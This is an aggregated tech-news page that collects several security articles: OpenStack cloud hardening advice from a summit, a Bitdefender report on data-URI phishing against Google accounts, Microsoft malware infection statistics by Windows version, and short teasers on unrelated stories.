6 C
Monday, November 20, 2017

Properly Securing OpenStack Cloud Core Focus at Summit

The OpenStack Summit devoted many sessions to securing the open-source cloud platform. Some experts said the cloud offers an opportunity to do good security work. ATLANTA—At multiple sessions at the OpenStack Summit here, developers and security researchers provided insight and details on properly securing an OpenStack cloud deployment. Security is one of the most often cited barriers to cloud adoption, but experts speaking at the summit don't see it as an obstacle. Enterprises really should look at cloud security from the opposite viewpoint, said Bryan Payne, director of security research at Nebula. "Cloud is an interesting opportunity to do really good security work," Payne said. "The cloud has orchestration tools that allow you to roll out consistent configuration and update your software consistently, as well." In a cloud deployment, there is also known hardware and software, and by having a known base, it is easier for enterprises to take the right steps to secure the cloud infrastructure, Payne said. "When rolling out infrastructure for cloud, enterprises have control of what is in place and that's a security dream," he said. A typical security function is to look at a system to see what is different from what is expected. As such, the more an organization knows about its systems, the more it can detect any divergence. "So if you have an orchestration system and you know what your hardware and software is, then you've got a good platform for security," Payne said.To ensure OpenStack cloud platform security, Payne advocates making sure that there is a separation of concerns such that there is a different logical network for outside the cloud versus the internal cloud network. Payne also recommends the use of Transport Layer Security (TLS) to be configured for all OpenStack deployments. TLS provides encryption for data in motion across a network. In a cloud deployment, beyond just the actual infrastructure that provides compute, there are also guests that run on top of the cloud in virtual machines (VMs). One of the potential cloud security risks outlined by Payne is known as a VM breakout. "What a VM breakout means is I can run code in an instance that will exploit something in the virtualization layer that will then let me run code on the host operating system itself," Payne said.  In a VM breakout situation, an attacker could potentially get access to other VMs running in a cloud. Payne emphasized that there are steps organizations can take to limit the risk of VM breakouts. Among those steps is the proper use of SELinux, or Security Enhanced Linux, which provides mandatory access control rules for processes and applications on a system. "Getting the cloud up and running is step one," Payne said. "Securing the cloud is step two, and it is often harder than step one." Keystone Identity Service One primary control point for security in an OpenStack cloud is the Keystone identity service.  Organizations should take steps to secure Keystone, Keith Newstadt, cloud services architect at Symantec, explained during a session at the summit. As an identity provider, Keystone is likely to be a target for brute-force attacks, he explained, in which criminals attempt to force their way into a system by using automated username and password lists in an attempt to gain access. One way to protect Keystone against brute-force attacks is to introduce rate-limiting for user log-ins, Newstadt said. With rate limiting, only a certain number of user log-in requests can come into the system in a given time period. Organizations also need to be able to blacklist malicious IP addresses as well as detect and block anomalous patterns and user behaviors, he said. "Keystone is the gatekeeper for OpenStack," Newstadt said. "Credentials are the keys to the kingdom, so protect them." Sean Michael Kerner is a senior editor at eWEEK and InternetNews.com. Follow him on Twitter @TechJournalist.

Snowden: How the NSA ‘interdicts’ networking equipment to implant back doors...

[unable to retrieve full-text content] 'Supply chain interdiction' programme implanted NSA malware on US-made networking hardware

Point-of-sale malware becoming more sophisticated – report

Point-of-sale (PoS) systems that process debit and credit cards are being increasingly targeted with a wide range of malware, much of which has become highly sophisticated. Those are the findings of research undertaken by security firm Arbor Networks,...

Microsoft “Patch Tuesday” to fix critical security flaws

Microsoft's latest "Patch Tuesday" will fix two critical security flaws - and six further bugs - in a total of five updates today. However, none of the bugs will be addressed in Windows XP, which finally went out of support at the end of April, more t...

Blue Coat is looking to partner with business, says chief security...

Information security is about what you can make possible for the business, says Hugh Thompson, chief security strategist at security firm Blue Coat. This is the guiding principle for the company’s product development and acquisition strategy, he told Computer Weekly. “Information security professionals and suppliers increasingly have to adapt to the speed of business as quickly as they can,” said Thompson. This includes being able to deal with advanced and highly-targeted threats through technologies such as sandboxing and the ability to do forensics, set policy automatically, and share threat intelligence. “This approach means that if something happens, then we learn from it globally and we can prevent it from happening again,” said Thompson. Another key element is creating what he calls “safety nets” that enable the business to be confident and comfortable in taking more risks by using new technologies to win in their marketplace. Companies are increasingly looking to technology for competitive differentiators in a way they have not done in the past. “We want to build technology that can be put on the network to allow you to embrace technologies such as Dropbox and Google Docs, and roll out new services in a secure way,” said Thompson. Partner with businesses As a supplier, Blue Coat is looking to partner with businesses rather than being the people who enable IT security officers to say ‘no’, he said. For example, Blue Coat is enabling insurance companies to accept photos from customers to initiate claims by scanning the images at the gateway to ensure no malware passes into company systems. Similarly, credit companies are able to expose their internal risk assessment apps to car dealers to win business through prompt responses because of Blue Coat’s ability to block any malicious input from reaching the app. As part of this strategy, Blue Coat is building on its dominant market position in secure web gateway and proxy products to focus on security as a means to make other things possible. “We re-tasked the company around that mission in May 2013 and have made a few acquisitions to support it,” said Thompson. These include SSL visibility and inspection firm Netronome, security analytics and forensics firm Solera Networks and threat discovery, malware analysis and sandboxing firm Norman Shark. These acquisitions have also helped Blue Coat support the idea that while companies should protect as well as they can, they should also have the ability for recovery when bad things happen, said Thompson. “Companies are confident to do edgier things because they know they can identify malicious activity very quickly and block it,” he said. Demand for technology to support this approach has grown in recent months, he said, driven in part by large number of high-profile data breaches in the news. “A year ago, many companies believed they could protect their data by locking things down, but now they are starting to realise that bad things happen even to those that take security seriously,” said Thompson. The move has been led by financial services companies that tend to be early adopters of new security strategies and technologies. Forensic investigations “These companies understand the need for this approach because many have had to do post-incident forensic investigations using third parties,” he said. “They have seen how unsatisfying the answers usually are and so they are now asking if they can put a technology infrastructure in place to be able to do this stuff quickly.” Financial services firms and government agencies are leading the demand for the ability to recover and provide accurate answers to the public and the board quickly, he said. “This enables companies to say exactly how bad a breach was without having to continually revise severity assessments and take immediate steps to block an attack and recover,” said Thompson. “Outside finance and government, there is still a need to encourage organisations to treat data security in the same way as other types of safety by including ways to cope when they go wrong.” Thompson said this approach will become more important as companies increasingly need to adopt technology such as cloud computing at a faster rate just to remain competitive and support growth. Email Alerts Register now to receive ComputerWeekly.com IT-related news, guides and more, delivered to your inbox. By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy Read More Related content from ComputerWeekly.com RELATED CONTENT FROM THE TECHTARGET NETWORK

Security Think Tank: Do not trust the network to ensure secure...

Most enterprises have much to gain from supporting collaborative working. For those founded on R&D it is pretty much second nature: proprietary tools support internal capabilities, uptake of social platforms encourages user participation.  Such organisations quickly pick up, pilot and absorb – or drop - iterations as they launch, and Corporate IT Forum members regularly share results and views on effectiveness (‘Yammer’ being a case in point as I write). Commercial relationships with external organisations, too, can benefit from a collaborative approach, particularly in the drive to foster innovation. But it is this process of external collaboration that most often raises challenges in meeting security and data standards, and it is vital to appreciate that, by and large, it is not the tools used for collaboration that create risk, but rather the environment they operate in. For example, in the Cloud, or across geographies. A recent Forum workshop addressed this issue of third-party collaboration, asking questions such as how practical is working across and beyond boundaries? Does the actual reward outweigh the potential risk? How are enterprises bringing partners and suppliers inside the firewall while still keeping all parties' sensitive data protected? It concluded that for many, the de-perimeterisation of the network has already happened and the natural consequence of collaboration with partners and suppliers is that they are effectively already inside the firewall.  “It just means that you do not know where the edge of your, or their, network is.” Even greater reason to protect sensitive data, and for all parties to provide assurance that their interconnectivity is not introducing unacceptable risks, and that their partners' partners are not a risk liability. But Forum members are keen not to reinvent the wheel when faced with this apparent ‘new’ security risk, but to apply the recognised good practice of existing security principles: Know the Data: manage data based upon classification. Use ‘read-only’ where appropriate and screen scraping tools Know the Users: IDM/IAM. Modify the data view according to access location Know the Systems: have endpoint assurance Do not trust the Network: monitoring and management. Enforce security protocols Apply these principles anywhere, including in the cloud, whether public or private – and do not forget to  support the principles with monitored audit trails. Ollie Ross is head of research at The Corporate IT Forum. More on secure collaboration: Security Think Tank: How to share data securely Security Think Tank: Enable collaboration by putting data at the heart of security Security Think Tank: Collaboration without compromise Security Think Tank: Secure and seamless collaboration key for business Security Think Tank: Secure collaboration not just about technology Email Alerts Register now to receive ComputerWeekly.com IT-related news, guides and more, delivered to your inbox. By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy Read More Related content from ComputerWeekly.com RELATED CONTENT FROM THE TECHTARGET NETWORK This was first published in May 2014

Phishing attacks target Google accounts, warns Bitdefender

Hackers are stealing Google account passwords using a new phishing attack that is hard to catch with traditional heuristic detection, warns security firm Bitdefender. The attack exploits the uniform resource identifiers (URIs) that Google Chrome uses to display data. This makes Chrome users most vulnerable, but the attack also targets Mozilla Firefox users. “With access to users’ Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents,” said Catalin Cosoi, chief security strategist at Bitdefender. “The scam starts with an email allegedly sent by Google, with 'Mail Notice' or 'New Lockout Notice' as the subject,” he said. The messages reads: “This is a reminder that your email account will be locked out in 24 hours, due to not being able to increase your email storage quota.  "Go to the INSTANT INCREASE to increase your Email storage automatically.” The link then redirects victims to a fake Google login web page that asks for their credentials. “What is interesting about this phishing attack is that users end up having the 'data:' in their browser’s address bar, which indicates the use of a data URI scheme,” said Cosoi. The data URI scheme, he said, allows scammers to include data in-line in web pages, as if they were external resources. The scheme uses Base64 encoding to represent file contents, in this case supplying the content of the fake web page in an encoded string in the data URI. As Google Chrome does not show the whole string, Cosoi said regular users may not realise they are being targeted in a phishing attack and give their data to cyber criminals. Disguised phishing on the rise Google, Facebook, eBay, phone services and financial institutions are among phishers’ favourite disguises to invade inboxes worldwide, he said. Phishing attacks are likely to increase due to the use of automation and the ability to bypass host-based detection systems, according to Johanne Ullrich, dean of research for the SANS Technology Institute. However, this does not mean that businesses are powerless against such attacks. There are several ways businesses can reduce the risk of successful phishing attacks. These range from security education aimed at making users more aware of phishing techniques, to implanting effective methods and procedures such as continuous network monitoring Read more about phishing attacks Phishing attacks track mobile adoption, research shows Anti-phishing vital in Scada protection, says expert Phishing attacks cast wider nets in businesses Black Hat 2012: Phishing and social engineering penetration testing Don’t get spiked by a spear phisher Mitigate phishing attacks in the cloud: A how-to Email Alerts Register now to receive ComputerWeekly.com IT-related news, guides and more, delivered to your inbox. By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy Read More Related content from ComputerWeekly.com RELATED CONTENT FROM THE TECHTARGET NETWORK

Windows Vista trumps XP in fourth quarter malware infections, report reveals

The last quarter of 2013 saw a dramatic rise in malware infections of computers running supported versions of Microsoft Windows, a report has revealed. The increase was mainly due to the Rotbrow family of malware made up of Trojans that install browser add-ons. These claim to protect you from other add-ons, according to the latest version of the Microsoft Security Intelligence Report (SIR). The number of infected machines is expected to return to more typical levels in 2014, the report said. Typically older versions of operating systems show a higher infection rate, but Windows Vista topped the infection charts in the last three months of 2013. Even Windows 7 recorded a higher infection rate than the 13-year-old Windows XP operating system, which was the oldest in the sample and for which Microsoft has since discontinued support. According to the SIR version 16, Windows XP SP3 computers had an infection rate of just 2.42% in the last quarter of 2013, compared with 3.24% for Windows Vista SP2 and 2.59% for Windows 7 SP1. Windows 8 had a 1.73% infection rate and Windows 8.1 just 0.08%, according to figures normalised to account for the different number of computers running each version of the operating system. However, these figures do not necessarily mean that Windows 7 is a less safe environment than Windows XP, according to independent security consultant Graham Cluley. If configured correctly, he said, Windows 7 can provide better security than Windows XP because users can take full advantage of Microsoft’s Enhanced Mitigation Experience Toolkit (EMET), a utility that can block malware successfully exploiting zero-day vulnerabilities. Although EMET can be run on run on Windows XP Service Pack 3, users of that platform do not have access to all of its protection features, Cluley wrote in a blog post. He also points out that the statistics in Microsoft’s report cover a period when Windows XP was still receiving security updates from Microsoft. “Going forward we can expect XP computers to become more and more riddled with malware as security holes are left unpatched,” said Cluley. He also points out this decline will not be reflected in future Microsoft SIRs because the company collects statistics only on supported versions of Windows. According to a newly published security report by the Information Commissioner’s Office (ICO), failure to update the security of software is the most common reason companies fail to keep personal data safe. The report highlights seven other common reasons organisations have failed to keep personal data secure that have been drawn from the ICO’s investigations into data breaches. “In just the past couple of months we have already seen widespread concern over the expiry of support for Microsoft XP and the uncovering of the security flaw known as Heartbleed,” said Simon Rice, the ICO’s group manager for technology. “While these security issues may seem complex, it is important that organisations of all sizes have a basic understanding of these types of threats and know what action they need to take to make sure their computer systems are keeping customers’ information secure,” he said. Rice said ICO investigations have shown that while some organisations are taking IT security seriously, too many are failing at the basics. Read more about Microsoft Security Intelligence Reports Europe tops Microsoft cyber security policy report Conficker still a threat to business, finds Security Intelligence Report Assessing the value of cloud security threat intelligence services Top cyber threats underline need for security awareness Microsoft Security Intelligence Report warns business of social network phishing attacks Email Alerts Register now to receive ComputerWeekly.com IT-related news, guides and more, delivered to your inbox. By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy Read More Related content from ComputerWeekly.com RELATED CONTENT FROM THE TECHTARGET NETWORK

Microsoft Pushes Windows 8.1 Update Deadline to June 10

Microsoft urges Windows 8.1 users to apply the update or risk missing out on future security updates. The company appears to be convincing users to make the jump. Microsoft is giving Windows 8.1 holdouts a littl...

Bitcoin miner startup slapped with involuntary bankruptcy petition

HashFast: “We are evaluating our options and preparing our response."

After 17-year march, Army still drags its boots on buying high-tech...

Volume radio purchasing starts in 2017—until then, Army may still use hand signals.

License plate reader error leads to traffic stop at gunpoint, court...

Flagged vehicle did not even match the model of what the woman was driving.